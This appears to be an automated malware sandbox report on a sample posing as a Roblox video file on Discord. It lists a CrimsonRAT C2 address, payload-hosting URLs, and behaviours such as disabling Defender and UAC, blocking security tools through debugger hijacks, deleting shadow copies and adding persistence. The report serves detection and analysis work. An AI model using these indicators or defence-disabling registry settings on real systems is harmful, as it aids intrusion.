Analysis
-
max time kernel
575s -
max time network
576s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
06-08-2024 04:28
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://cdn.discordapp.com/attachments/1214735818472558646/1270183447918415902/robloxapp-20240802-1831583.wmv?ex=66b2c604&is=66b17484&hm=55b47e3987876be3720559b84781030d4a7f07fe97e2f75d58130ab55a74205c&
Resource
win10v2004-20240802-en
Errors
General
-
Target
https://cdn.discordapp.com/attachments/1214735818472558646/1270183447918415902/robloxapp-20240802-1831583.wmv?ex=66b2c604&is=66b17484&hm=55b47e3987876be3720559b84781030d4a7f07fe97e2f75d58130ab55a74205c&
Malware Config
Extracted
http://blockchainjoblist.com/wp-admin/014080/
https://womenempowermentpakistan.com/wp-admin/paba5q52/
https://atnimanvilla.com/wp-content/073735/
https://yeuquynhnhai.com/upload/41830/
https://deepikarai.com/js/4bzs6/
Extracted
crimsonrat
185.136.161.124
Signatures
-
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection RedEye.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" RedEye.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4752 6812 powershell.exe 356 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" RedEye.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 4 IoCs
flow pid Process 494 4752 powershell.exe 498 4752 powershell.exe 501 4752 powershell.exe 504 4752 powershell.exe -
Disables RegEdit via registry modification 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" RedEye.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" RedEye.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Downloads MZ/PE file
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mb3-setup-1878.1878-3.3.1.2183.exe RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mb3-setup-1878.1878-3.3.1.2183.exe\Debugger = "RIP" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HitmanPro.exe\Debugger = "RIP" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HitmanPro_x64.exe\Debugger = "RIP" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\microsoftedgecp.exe\Debugger = "RIP" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\yandex.exe\Debugger = "RIP" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\recoverydrive.exe\Debugger = "RIP" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RKill.exe\Debugger = "RIP" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rkill.scr\Debugger = "RIP" RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rkill64.scr RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HitmanPro.exe RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mspaint.exe RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RKill64.exe\Debugger = "RIP" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad++.exe\Debugger = "RIP" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe\Debugger = "RIP" RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exe RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\logoff.exe RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger = "RIP" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rkill-unsigned.exe\Debugger = "RIP" RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iExplore64.exe RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger = "RIP" RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Autoruns.exe RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "RIP" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\logoff.exe\Debugger = "RIP" RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RKill.exe RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "RIP" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rkill64.com\Debugger = "RIP" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "RIP" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe\Debugger = "RIP" RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\microsoftedge.exe RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\microsoftedgecp.exe RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rkill-unsigned64.exe\Debugger = "RIP" RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rkill.com\Debugger = "RIP" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdwCleaner.exe\Debugger = "RIP" RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\opera.exe RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RKill64.exe RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rkill-unsigned64.exe RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ComboFix.exe\Debugger = "RIP" RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdwCleaner.exe RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Autoruns64.exe\Debugger = "RIP" RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ZAM.exe RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe\Debugger = "RIP" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe\Debugger = "RIP" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe\Debugger = "RIP" RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe\Debugger = "RIP" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "RIP" RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rkill.com RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe\Debugger = "RIP" RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rkill64.scr\Debugger = "RIP" RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\control.exe RedEye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rkill.scr RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ZAM.exe\Debugger = "RIP" RedEye.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 5896 NetSh.exe -
Checks computer location settings 2 TTPs 42 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation Wave Browser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation SWUpdater.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation SWUpdater.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation RedEye.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation CrimsonRAT.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation CrimsonRAT.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation CrimsonRAT.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation SWUpdater.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation wavebrowser.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 64 IoCs
pid Process 712 YouAreAnIdiot.exe 1684 YouAreAnIdiot.exe 3248 YouAreAnIdiot.exe 4532 YouAreAnIdiot.exe 2216 YouAreAnIdiot.exe 4504 YouAreAnIdiot.exe 2284 butterflyondesktop.exe 3780 butterflyondesktop.tmp 2456 butterflyondesktop.exe 2320 butterflyondesktop.exe 1796 butterflyondesktop.tmp 4484 butterflyondesktop.tmp 5084 ButterflyOnDesktop.exe 1228 Wave Browser.exe 4552 Wave Browser.exe 2664 Wave Browser.exe 3216 SWUpdaterSetup.exe 4868 SWUpdater.exe 5160 SWUpdater.exe 5188 SWUpdaterComRegisterShell64.exe 5212 SWUpdaterComRegisterShell64.exe 5232 SWUpdaterComRegisterShell64.exe 5304 SWUpdater.exe 5348 SWUpdater.exe 5404 SWUpdater.exe 5748 WaveInstaller-v1.5.18.2.exe 5828 setup.exe 5848 setup.exe 2892 setup.exe 1892 setup.exe 3796 wavebrowser.exe 5572 wavebrowser.exe 1056 wavebrowser.exe 3760 wavebrowser.exe 4680 wavebrowser.exe 5716 wavebrowser.exe 1472 wavebrowser.exe 5884 wavebrowser.exe 5644 SWUpdater.exe 5152 wavebrowser.exe 6028 wavebrowser.exe 5636 wavebrowser.exe 4132 wavebrowser.exe 5160 wavebrowser.exe 3644 wavebrowser.exe 5272 wavebrowser.exe 5268 wavebrowser.exe 3712 wavebrowser.exe 1644 wavebrowser.exe 3648 wavebrowser.exe 3480 wavebrowser.exe 620 wavebrowser.exe 4772 wavebrowser.exe 5844 wavebrowser.exe 1608 wavebrowser.exe 5540 wavebrowser.exe 6056 wavebrowser.exe 6276 wavebrowser.exe 6364 wavebrowser.exe 6384 wavebrowser.exe 6508 wavebrowser.exe 6668 wavebrowser.exe 6700 wavebrowser.exe 6820 wavebrowser.exe -
Loads dropped DLL 64 IoCs
pid Process 4868 SWUpdater.exe 5160 SWUpdater.exe 5188 SWUpdaterComRegisterShell64.exe 5160 SWUpdater.exe 5212 SWUpdaterComRegisterShell64.exe 5160 SWUpdater.exe 5232 SWUpdaterComRegisterShell64.exe 5160 SWUpdater.exe 5304 SWUpdater.exe 5348 SWUpdater.exe 5404 SWUpdater.exe 5404 SWUpdater.exe 5348 SWUpdater.exe 3796 wavebrowser.exe 5572 wavebrowser.exe 3796 wavebrowser.exe 1056 wavebrowser.exe 3760 wavebrowser.exe 1056 wavebrowser.exe 3760 wavebrowser.exe 1056 wavebrowser.exe 1056 wavebrowser.exe 1056 wavebrowser.exe 1056 wavebrowser.exe 1056 wavebrowser.exe 1056 wavebrowser.exe 4680 wavebrowser.exe 4680 wavebrowser.exe 1472 wavebrowser.exe 1472 wavebrowser.exe 5884 wavebrowser.exe 5884 wavebrowser.exe 5644 SWUpdater.exe 5716 wavebrowser.exe 5716 wavebrowser.exe 5152 wavebrowser.exe 5152 wavebrowser.exe 6028 wavebrowser.exe 5636 wavebrowser.exe 6028 wavebrowser.exe 4132 wavebrowser.exe 5636 wavebrowser.exe 4132 wavebrowser.exe 5160 wavebrowser.exe 3644 wavebrowser.exe 3644 wavebrowser.exe 5160 wavebrowser.exe 5272 wavebrowser.exe 5268 wavebrowser.exe 5272 wavebrowser.exe 3712 wavebrowser.exe 3712 wavebrowser.exe 5844 wavebrowser.exe 5844 wavebrowser.exe 1644 wavebrowser.exe 3648 wavebrowser.exe 1608 wavebrowser.exe 1608 wavebrowser.exe 3648 wavebrowser.exe 1644 wavebrowser.exe 3480 wavebrowser.exe 3480 wavebrowser.exe 620 wavebrowser.exe 620 wavebrowser.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 11 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop = "C:\\Program Files (x86)\\Butterfly on Desktop\\ButterflyOnDesktop.exe" ButterflyOnDesktop.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wavesor SWUpdater = "\"C:\\Users\\Admin\\Wavesor Software\\SWUpdater\\1.3.133.0\\SWUpdaterCore.exe\"" SWUpdater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\Downloads\\RedEye.exe" RedEye.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop = "C:\\Program Files (x86)\\Butterfly on Desktop\\ButterflyOnDesktop.exe" ButterflyOnDesktop.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tbibra_dreb = "C:\\ProgramData\\Hdlharas\\dlrarhsiva.exe" dlrarhsiva.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop = "C:\\Program Files (x86)\\Butterfly on Desktop\\ButterflyOnDesktop.exe" ButterflyOnDesktop.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop = "C:\\Program Files (x86)\\Butterfly on Desktop\\ButterflyOnDesktop.exe" ButterflyOnDesktop.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop = "C:\\Program Files (x86)\\Butterfly on Desktop\\ButterflyOnDesktop.exe" ButterflyOnDesktop.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop butterflyondesktop.tmp Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\Downloads\\RedEye.exe" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\Downloads\\RedEye.exe" RedEye.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" RedEye.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 88 raw.githubusercontent.com 89 raw.githubusercontent.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000800000002359a-516.dat autoit_exe -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName wavebrowser.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer wavebrowser.exe -
Drops autorun.inf file 1 TTPs 2 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File created C:\autorun.inf RedEye.exe File opened for modification C:\autorun.inf RedEye.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\Desktop\WallPaper = "C:\\redeyebmp.bmp" RedEye.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\Desktop\WallPaper = "C:\\redeyebmp.bmp" RedEye.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\VN wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\manifest.fingerprint wavebrowser.exe File opened for modification C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\BasicElegant.dotx WINWORD.EXE File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_992455320\manifest.fingerprint wavebrowser.exe File created C:\Program Files (x86)\Wavesor\Temp\GUM61A9.tmp\SWUpdaterBroker.exe SWUpdaterSetup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\NI wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\LS wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1827865981\manifest.fingerprint wavebrowser.exe File opened for modification C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\Centered.dotx WINWORD.EXE File created C:\Program Files (x86)\Butterfly on Desktop\is-VG5JL.tmp butterflyondesktop.tmp File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_564898447\_platform_specific\win_x64\widevinecdm.dll.sig wavebrowser.exe File created C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\~$sicElegant.dotx WINWORD.EXE File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_634507433\manifest.json wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\IQ wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\PE wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\NR wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\BH wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_785369388\manifest.json wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_992455320\_metadata\verified_contents.json wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\SL wavebrowser.exe File created C:\Program 